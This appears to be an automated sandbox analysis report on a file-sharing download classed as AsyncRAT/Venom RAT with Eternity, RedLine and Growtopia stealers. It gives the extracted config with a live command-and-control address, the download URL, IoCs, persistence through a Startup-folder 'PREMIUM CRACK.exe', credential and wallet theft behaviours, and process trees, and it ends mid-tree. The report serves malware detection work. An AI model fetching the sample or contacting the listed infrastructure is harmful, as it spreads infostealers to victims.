asyncrat | hxxps://gofile[.]io/d/SD0Axa

Resubmissions

09-03-2024 19:26

240309-x5yyfsgb77 10

09-03-2024 19:03

240309-xqftbsff87 10

Analysis

max time kernel
155s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09-03-2024 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/SD0Axa

Score

10^/10

asyncrat eternity growtopia redline growtopia discovery infostealer rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Growtopia

163.5.215.225:1602

Mutex

hoosnuxddbjezlt

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detects Eternity stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/files/0x000700000002329e-360.dat	eternity_stealer
behavioral1/memory/5568-362-0x0000000000180000-0x00000000002B4000-memory.dmp	eternity_stealer

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity
Growtopia
Growtopa is an opensource modular stealer written in C#.
stealer growtopia
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/6072-378-0x0000025CB7EF0000-0x0000025CB7F08000-memory.dmp	family_asyncrat

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Update.bat.exeWScript.exeFIxer.bat.exeWScript.exestartup_str_687.bat.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	Update.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	FIxer.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	startup_str_687.bat.exe

Drops startup file 2 IoCs

Processes:

PREMIUM CRACK.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PREMIUM CRACK.exe	PREMIUM CRACK.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PREMIUM CRACK.exe	PREMIUM CRACK.exe

Executes dropped EXE 7 IoCs

Processes:

Update.bat.exeFIxer.bat.exestartup_str_15.bat.exePREMIUM CRACK.exedcd.exestartup_str_687.bat.exeEternity.exe

pid	Process
5620	Update.bat.exe
1228	FIxer.bat.exe
6072	startup_str_15.bat.exe
5568	PREMIUM CRACK.exe
6092	dcd.exe
5408	startup_str_687.bat.exe
4772	Eternity.exe

Loads dropped DLL 9 IoCs

Processes:

Eternity.exe

pid	Process
4772	Eternity.exe
4772	Eternity.exe
4772	Eternity.exe
4772	Eternity.exe
4772	Eternity.exe
4772	Eternity.exe
4772	Eternity.exe
4772	Eternity.exe
4772	Eternity.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 3 IoCs

Processes:

msedge.exeUpdate.bat.exeFIxer.bat.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings	Update.bat.exe
Key created	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings	FIxer.bat.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exeUpdate.bat.exepowershell.exepowershell.exeFIxer.bat.exestartup_str_15.bat.exepowershell.exepowershell.exepowershell.exestartup_str_687.bat.exepowershell.exemsedge.exe

pid	Process
2504	msedge.exe
2504	msedge.exe
2288	msedge.exe
2288	msedge.exe
5548	identity_helper.exe
5548	identity_helper.exe
5512	msedge.exe
5512	msedge.exe
5620	Update.bat.exe
5620	Update.bat.exe
5620	Update.bat.exe
3376	powershell.exe
3376	powershell.exe
3376	powershell.exe
5416	powershell.exe
5416	powershell.exe
5416	powershell.exe
1228	FIxer.bat.exe
1228	FIxer.bat.exe
6072	startup_str_15.bat.exe
6072	startup_str_15.bat.exe
1228	FIxer.bat.exe
6072	startup_str_15.bat.exe
4148	powershell.exe
4148	powershell.exe
4304	powershell.exe
4304	powershell.exe
4148	powershell.exe
4304	powershell.exe
5560	powershell.exe
5560	powershell.exe
5560	powershell.exe
5408	startup_str_687.bat.exe
5408	startup_str_687.bat.exe
5408	startup_str_687.bat.exe
5512	powershell.exe
5512	powershell.exe
5512	powershell.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5408	startup_str_687.bat.exe
5408	startup_str_687.bat.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid	Process
5368	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

msedge.exe

pid	Process
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exe7zFM.exeUpdate.bat.exepowershell.exepowershell.exe

description	pid	Process
Token: SeRestorePrivilege	5368	7zFM.exe
Token: 35	5368	7zFM.exe
Token: SeRestorePrivilege	856	7zFM.exe
Token: 35	856	7zFM.exe
Token: SeSecurityPrivilege	5368	7zFM.exe
Token: SeDebugPrivilege	5620	Update.bat.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeIncreaseQuotaPrivilege	3376	powershell.exe
Token: SeSecurityPrivilege	3376	powershell.exe
Token: SeTakeOwnershipPrivilege	3376	powershell.exe
Token: SeLoadDriverPrivilege	3376	powershell.exe
Token: SeSystemProfilePrivilege	3376	powershell.exe
Token: SeSystemtimePrivilege	3376	powershell.exe
Token: SeProfSingleProcessPrivilege	3376	powershell.exe
Token: SeIncBasePriorityPrivilege	3376	powershell.exe
Token: SeCreatePagefilePrivilege	3376	powershell.exe
Token: SeBackupPrivilege	3376	powershell.exe
Token: SeRestorePrivilege	3376	powershell.exe
Token: SeShutdownPrivilege	3376	powershell.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeSystemEnvironmentPrivilege	3376	powershell.exe
Token: SeRemoteShutdownPrivilege	3376	powershell.exe
Token: SeUndockPrivilege	3376	powershell.exe
Token: SeManageVolumePrivilege	3376	powershell.exe
Token: 33	3376	powershell.exe
Token: 34	3376	powershell.exe
Token: 35	3376	powershell.exe
Token: 36	3376	powershell.exe
Token: SeDebugPrivilege	5416	powershell.exe
Token: SeIncreaseQuotaPrivilege	5416	powershell.exe
Token: SeSecurityPrivilege	5416	powershell.exe
Token: SeTakeOwnershipPrivilege	5416	powershell.exe
Token: SeLoadDriverPrivilege	5416	powershell.exe
Token: SeSystemProfilePrivilege	5416	powershell.exe
Token: SeSystemtimePrivilege	5416	powershell.exe
Token: SeProfSingleProcessPrivilege	5416	powershell.exe
Token: SeIncBasePriorityPrivilege	5416	powershell.exe
Token: SeCreatePagefilePrivilege	5416	powershell.exe
Token: SeBackupPrivilege	5416	powershell.exe
Token: SeRestorePrivilege	5416	powershell.exe
Token: SeShutdownPrivilege	5416	powershell.exe
Token: SeDebugPrivilege	5416	powershell.exe
Token: SeSystemEnvironmentPrivilege	5416	powershell.exe
Token: SeRemoteShutdownPrivilege	5416	powershell.exe
Token: SeUndockPrivilege	5416	powershell.exe
Token: SeManageVolumePrivilege	5416	powershell.exe
Token: 33	5416	powershell.exe
Token: 34	5416	powershell.exe
Token: 35	5416	powershell.exe
Token: 36	5416	powershell.exe
Token: SeIncreaseQuotaPrivilege	5416	powershell.exe
Token: SeSecurityPrivilege	5416	powershell.exe
Token: SeTakeOwnershipPrivilege	5416	powershell.exe
Token: SeLoadDriverPrivilege	5416	powershell.exe
Token: SeSystemProfilePrivilege	5416	powershell.exe
Token: SeSystemtimePrivilege	5416	powershell.exe
Token: SeProfSingleProcessPrivilege	5416	powershell.exe
Token: SeIncBasePriorityPrivilege	5416	powershell.exe
Token: SeCreatePagefilePrivilege	5416	powershell.exe
Token: SeBackupPrivilege	5416	powershell.exe
Token: SeRestorePrivilege	5416	powershell.exe
Token: SeShutdownPrivilege	5416	powershell.exe
Token: SeDebugPrivilege	5416	powershell.exe
Token: SeSystemEnvironmentPrivilege	5416	powershell.exe

Suspicious use of FindShellTrayWindow 46 IoCs

Processes:

msedge.exe7zFM.exe7zFM.exe

pid	Process
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
856	7zFM.exe
5368	7zFM.exe
5368	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	Process
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe
2288	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	Process	procid_target
PID 2288 wrote to memory of 4808	2288	msedge.exe	90
PID 2288 wrote to memory of 4808	2288	msedge.exe	90
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2404	2288	msedge.exe	92
PID 2288 wrote to memory of 2504	2288	msedge.exe	93
PID 2288 wrote to memory of 2504	2288	msedge.exe	93
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94
PID 2288 wrote to memory of 1624	2288	msedge.exe	94

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
5036	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/SD0Axa
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8196946f8,0x7ff819694708,0x7ff819694718
  2⤵
  PID:4808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
  2⤵
  PID:2404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
  2⤵
  PID:1624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:5096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:4988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:3824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
  2⤵
  PID:5416
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:8
  2⤵
  PID:5532
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3908 /prefetch:8
  2⤵
  PID:5960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
  2⤵
  PID:5968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
  2⤵
  PID:5128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
  2⤵
  PID:3852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5512
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Eternity.rar"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:856
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Eternity.rar"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:5368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,785755901774170341,11639618990913688425,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6084 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff80aaa9758,0x7ff80aaa9768,0x7ff80aaa9778
1⤵
PID:4324

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1120

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1880,i,10781024700586631826,6202099625186290404,131072 /prefetch:2
1⤵
PID:3240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1880,i,10781024700586631826,6202099625186290404,131072 /prefetch:8
1⤵
PID:1552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2256 --field-trial-handle=1880,i,10781024700586631826,6202099625186290404,131072 /prefetch:8
1⤵
PID:2232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=3116 --field-trial-handle=1880,i,10781024700586631826,6202099625186290404,131072 /prefetch:1
1⤵
PID:1700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=3136 --field-trial-handle=1880,i,10781024700586631826,6202099625186290404,131072 /prefetch:1
1⤵
PID:3264

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=4620 --field-trial-handle=1880,i,10781024700586631826,6202099625186290404,131072 /prefetch:1
1⤵
PID:3356

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Update.bat" "
1⤵
PID:4472
- C:\Users\Admin\Downloads\Update.bat.exe
